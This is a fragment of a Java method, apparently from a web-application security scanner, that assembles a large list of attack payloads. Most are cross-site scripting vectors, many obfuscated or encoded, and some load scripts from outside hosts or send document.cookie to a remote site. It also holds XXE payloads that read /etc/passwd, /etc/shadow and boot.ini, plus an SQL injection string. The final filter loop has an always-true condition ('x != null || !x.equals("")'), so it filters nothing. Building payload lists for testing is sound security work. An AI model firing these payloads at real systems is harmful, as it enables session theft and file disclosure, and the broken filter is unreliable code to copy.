                + "<input type=\"image\" dynsrc=\"javascript:document.vulnerable=true;\">\n"
                + "<bgsound src=\"javascript:document.vulnerable=true;\">\n"
                + "&<script>document.vulnerable=true;</script>\n"
                + "&{document.vulnerable=true;};\n"
                + "<img src=&{document.vulnerable=true;};>\n"
                + "<link rel=\"stylesheet\" href=\"javascript:document.vulnerable=true;\">\n"
                + "<iframe src=\"vbscript:document.vulnerable=true;\">\n"
                + "<img src=\"mocha:document.vulnerable=true;\">\n"
                + "<img src=\"livescript:document.vulnerable=true;\">\n"
                + "<a href=\"about:<script>document.vulnerable=true;</script>\">\n"
                + "<meta http-equiv=\"refresh\" content=\"0;url=javascript:document.vulnerable=true;\">\n"
                + "<body onload=\"document.vulnerable=true;\">\n"
                + "<div style=\"background-image: url(javascript:document.vulnerable=true;);\">\n"
                + "<div style=\"behaviour: url([link to code]);\">\n"
                + "<div style=\"binding: url([link to code]);\">\n"
                + "<div style=\"width: expression(document.vulnerable=true;);\">\n"
                + "<style type=\"text/javascript\">document.vulnerable=true;</style>\n"
                + "<object classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\">\n"
                + "<style><!--</style><script>document.vulnerable=true;//--></script>\n"
                + "<<script>document.vulnerable=true;</script>\n"
                + "<![<!--]]<script>document.vulnerable=true;//--></script>\n"
                + "<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->\n"
                + "<img src=\"blah\"onmouseover=\"document.vulnerable=true;\">\n"
                + "<img src=\"blah>\" onmouseover=\"document.vulnerable=true;\">\n"
                + "<xml src=\"javascript:document.vulnerable=true;\">\n"
                + "<xml id=\"X\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>\n"
                + "<div datafld=\"b\" dataformatas=\"html\" datasrc=\"#X\"></div>\n"
                + "[\\xC0][\\xBC]script>document.vulnerable=true;[\\xC0][\\xBC]/script>\n"
                + "<style>@import'http://www.securitycompass.com/xss.css';</style>\n"
                + "<meta HTTP-EQUIV=\"Link\" Content=\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\">\n"
                + "<style>BODY{-moz-binding:url(\"http://www.securitycompass.com/xssmoz.xml#xss\")}</style>\n"
                + "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"></object>\n"
                + "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://www.securitycompass.com/xss.htc\"><xss:xss>XSS</xss:xss></html>\n"
                + "<script SRC=\"http://www.securitycompass.com/xss.jpg\"></script>\n"
                + "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'\"-->\n"
                + "<script a=\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script =\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=\">\" '' SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script \"a='>'\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=`>` SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=\">'>\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<div style=\"binding: url(http://www.securitycompass.com/xss.js);\"> [Mozilla]\n"
                + "\";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;\n"
                + "<;/script>;<;script>;alert(1)<;/script>;\n"
                + "<;/br style=a:expression(alert())>;\n"
                + "<;scrscriptipt>;alert(1)<;/scrscriptipt>;\n"
                + "<;br size=\\\";&;{alert(&#039;XSS&#039;)}\\\";>;\n"
                + "perl -e &#039;print \\\";<;IMG SRC=java\\0script:alert(\\\";XSS\\\";)>;\\\";;&#039; >; out\n"
                + "perl -e &#039;print \\\";<;SCR\\0IPT>;alert(\\\";XSS\\\";)<;/SCR\\0IPT>;\\\";;&#039; >; out\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\"http://www.procheckup.com/?sid=\"%2bdocument.cookie)>\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "<~/XSS STYLE=xss:expression(alert('XSS'))>\n"
                + "\"><script>alert('XSS')</script>\n"
                + "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "XSS STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "</XSS STYLE=xss:expression(alert('XSS'))>\n"
                + ">\"><script>alert(\"XSS\")</script>&\n"
                + "\"><STYLE>@import\"javascript:alert('XSS')\";</STYLE>\n"
                + ">\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>\n"
                + ">%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>\n"
                + "'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'\n"
                + "'';!--\"<XSS>=&{()}\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=JaVaScRiPt:alert('XSS')>\n"
                + "<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>\n"
                + "<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>\n"
                + "<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>    \n"
                + "<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>\n"
                + "<IMG SRC=\"jav&#x0A;ascript:alert(<WBR>'XSS');\">\n"
                + "<IMG SRC=\"jav&#x0D;ascript:alert(<WBR>'XSS');\">\n"
                + "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foof>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xee;</foo>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xee;</foo>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/shadow\">]><foo>&xee;</foo>\n"
                + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///dev/random\">]><foo>&xee;</foo>\n"
                + "<script>alert('XSS')</script>\n"
                + "%3cscript%3ealert('XSS')%3c/script%3e\n"
                + "%22%3e%3cscript%3ealert('XSS')%3c/script%3e\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n"
                + "<IMG SRC=javascript:alert('XSS')>       \n"
                + "<img src=xss onerror=alert(1)>\n"
                + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n"
                + "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n"
                + "<IMG SRC=\"jav ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n"
                + "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n"
                + "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n"
                + "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n"
                + "<BODY BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<BODY ONLOAD=alert('XSS')>\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=\"javascript:alert('XSS')\"\n"
                + "<iframe src=http://ha.ckers.org/scriptlet.html <\n"
                + "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n"
                + "%253cscript%253ealert(1)%253c/script%253e\n"
                + "\"><s\"%2b\"cript>alert(document.cookie)</script>\n"
                + "foo<script>alert(1)</script>\n"
                + "<scr<script>ipt>alert(1)</scr</script>ipt>\n"
                + "<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>\n"
                + "';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "<marquee onstart='javascript:alert('1');'>=(◕_◕)=";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }

}
